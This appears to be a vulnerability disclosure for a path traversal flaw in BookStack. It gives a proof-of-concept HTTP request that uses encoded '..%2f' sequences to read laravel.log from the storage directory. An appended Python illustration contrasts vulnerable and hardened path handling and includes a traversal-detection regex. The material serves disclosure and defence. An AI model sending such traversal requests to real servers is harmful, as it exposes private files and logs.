History: Oct 30, 2021 - 8:26 p.m.

Path Traversal in bookstackapp/bookstack

2021-10-30 20:26:21
theworstcomrade
www.huntr.dev
path traversal
bookstack
authenticated user
storage directory
predictable paths
log files

EPSS

0.001

Percentile

26.8%

Description

While reading the recent BookStack source code (85dc8d), I discovered a path traversal vulnerability. An authenticated user can access all files stored in the storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1


Impact

Read log files whose paths are predictable.
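The request above works because `..%2f` is decoded to `../` before the path is joined onto the storage directory, and nothing checks that the result still lies inside it. As an added illustration that is not part of this report or of BookStack's own code, the Python below contrasts that naive join with a containment check, and flags such requests in constructed access-log lines; the directory layout, URL prefix and log format are assumptions.

```python
import re
import posixpath
from urllib.parse import unquote

# Constructed layout (assumption, not taken from the report): images are served
# under /uploads/images/ from <storage>/uploads/images, logs live in <storage>/logs.
STORAGE_ROOT = "/var/www/bookstack/storage"
IMAGE_BASE = posixpath.join(STORAGE_ROOT, "uploads", "images")
URL_PREFIX = "/uploads/images/"

def naive_image_path(url_path):
    """Vulnerable pattern: decode the URL and join it onto the image directory
    with no containment check, so '..%2f' walks out of it after decoding."""
    rel = unquote(url_path[len(URL_PREFIX):])
    return posixpath.normpath(posixpath.join(IMAGE_BASE, rel))

def safe_image_path(url_path):
    """Hardened version: decode once, refuse leftover percent-encoding, normalise,
    and require the result to stay inside IMAGE_BASE. Returns None on escape.
    On a real filesystem also apply os.path.realpath so symlinks cannot bypass it."""
    rel = unquote(url_path[len(URL_PREFIX):])
    if "%" in rel:  # double-encoded input such as %252f: reject, never re-decode
        return None
    candidate = posixpath.normpath(posixpath.join(IMAGE_BASE, rel))
    if candidate != IMAGE_BASE and not candidate.startswith(IMAGE_BASE + "/"):
        return None
    return candidate

# Detection side: plain or percent-encoded '..' followed by a path separator.
TRAVERSAL_RE = re.compile(r"(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def flag_traversal_requests(log_lines):
    """Return the request paths in access-log lines that carry a traversal sequence."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and TRAVERSAL_RE.search(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed access-log lines; the second mirrors the request in the report.
SAMPLE_LOG = [
    '172.17.0.1 - - [30/Oct/2021:20:26:20 +0000] "GET /uploads/images/gallery/photo.png HTTP/1.1" 200 5120',
    '172.17.0.1 - - [30/Oct/2021:20:26:21 +0000] "GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1" 200 81234',
]

if __name__ == "__main__":
    poc = "/uploads/images/..%2f/..%2f/logs/laravel.log"
    print(naive_image_path(poc))  # /var/www/bookstack/storage/logs/laravel.log
    print(safe_image_path(poc))   # None
    print(flag_traversal_requests(SAMPLE_LOG))
```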

